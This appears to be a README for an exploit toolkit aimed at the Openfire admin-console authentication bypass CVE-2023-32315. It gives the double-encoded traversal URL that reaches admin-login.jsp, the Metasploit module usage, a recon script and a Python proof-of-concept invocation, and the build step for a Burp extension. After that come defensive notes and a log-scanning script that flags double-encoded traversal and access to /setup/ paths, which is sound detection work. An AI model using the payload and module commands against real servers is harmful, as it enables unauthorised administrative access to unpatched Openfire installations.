Openfire Exploit Suite

🔥 Overview

Openfire Exploit Suite provides recon → PoC → Metasploit exploitation tooling for:

  • CVE-2023-32315 (Admin Console Auth Bypass)
  • Placeholder CVE-2023-XXXX (Residual setup POST endpoint abuse)

🧩 Modules

  • exploit-core/: Python PoC for admin bypass.
  • metasploit-module/: Ruby modules (bypass + setup POST injection).
  • burp-automation/: Minimal Burp Extender.
  • recon-tools/: Automated scanning + report generation.

🩸 Metasploit Modules

Admin bypass:

use exploit/linux/http/openfire_admin_bypass
set RHOSTS <target>
run

Unauth setup POST:

use exploit/linux/http/openfire_setup_unauth
set RHOSTS <target>
set TARGETURI /setup/setup-someform.jsp
run

Module directory:

metasploit-module/exploits/linux/http/

Local load (if not copied into framework tree):

loadpath /absolute/path/to/openfire-exploit-suite/metasploit-module/exploits
reload_all

🚀 CVE-2023-32315 Summary

Double-encoded traversal to reach admin login:

/setup/setup-s/%252e%252e/%252e%252e/admin-login.jsp

🛠 Recon Flow

cd recon-tools
./run_recon.sh <target-ip>

Generates: nmap_full_scan.txt, ffuf_results.html, nikto_results.txt, recon_report.md / HTML variants.

🐍 Python PoC

python3 exploit-core/openfire_exploit.py --target http://<target-ip>:9090

🧠 Burp Extender

Entry: burp-automation/src/main/java/burp/BurpExtender.java

Build:

cd burp-automation
./gradlew clean build

📂 Repo Slimming

Key .gitignore patterns exclude Bundler, logs, coverage, native objects, IDE caches. Optionally extend to large output/ artifacts.

🔐 Defensive Notes

  • Upgrade to ≥ 4.6.9
  • Remove/lock /setup/ after install
  • Block double-encoded traversal at edge
  • Monitor access to legacy setup JSPs
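
The last two notes (double-encoded traversal and access to /setup/ paths) can be checked against web or reverse-proxy access logs. The script below is an added example, not part of this repository's tooling; it assumes common/combined log format, and the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Assumption: common/combined log format; adjust the regex for your proxy's format.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
MAX_DECODE_ROUNDS = 3  # bound the loop so crafted input cannot force unbounded work


def decode_rounds(path):
    """Percent-decode repeatedly; return (final_path, number_of_rounds_that_changed_it)."""
    rounds = 0
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(path)
        if decoded == path:
            break
        path, rounds = decoded, rounds + 1
    return path, rounds


def classify(line):
    """Return the set of findings for one access-log line (empty set if clean)."""
    m = REQUEST_RE.search(line)
    if not m:
        return set()
    raw_path = m.group("target").split("?", 1)[0]
    final, rounds = decode_rounds(raw_path)
    findings = set()
    # A ".." path segment that only appears after decoding is the signal of interest.
    has_dotdot = ".." in final.replace("\\", "/").split("/")
    if has_dotdot and rounds >= 2:
        findings.add("double-encoded-traversal")
    elif has_dotdot:
        findings.add("traversal")
    if final.lower().startswith("/setup/"):
        findings.add("setup-path-access")
    return findings


# Constructed sample lines (not captured traffic); 192.0.2.0/24 is a documentation range.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2025:10:00:00 +0000] "GET /login.jsp HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2025:10:00:05 +0000] "GET /setup/setup-s/%252e%252e/%252e%252e/admin-login.jsp HTTP/1.1" 200 2048',
    '192.0.2.12 - - [01/Jan/2025:10:00:09 +0000] "POST /setup/setup-someform.jsp HTTP/1.1" 302 0',
    '192.0.2.13 - - [01/Jan/2025:10:00:12 +0000] "GET /images/%2e%2e/index.jsp HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        hits = classify(entry)
        if hits:
            print(sorted(hits), entry)
```

A `double-encoded-traversal` finding paired with a 200 status on a `/setup/` path is the combination to alert on first; `setup-path-access` alone on a completed install is still worth reviewing.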

📣 Credits

Research & tooling by Taka (2025). Use responsibly.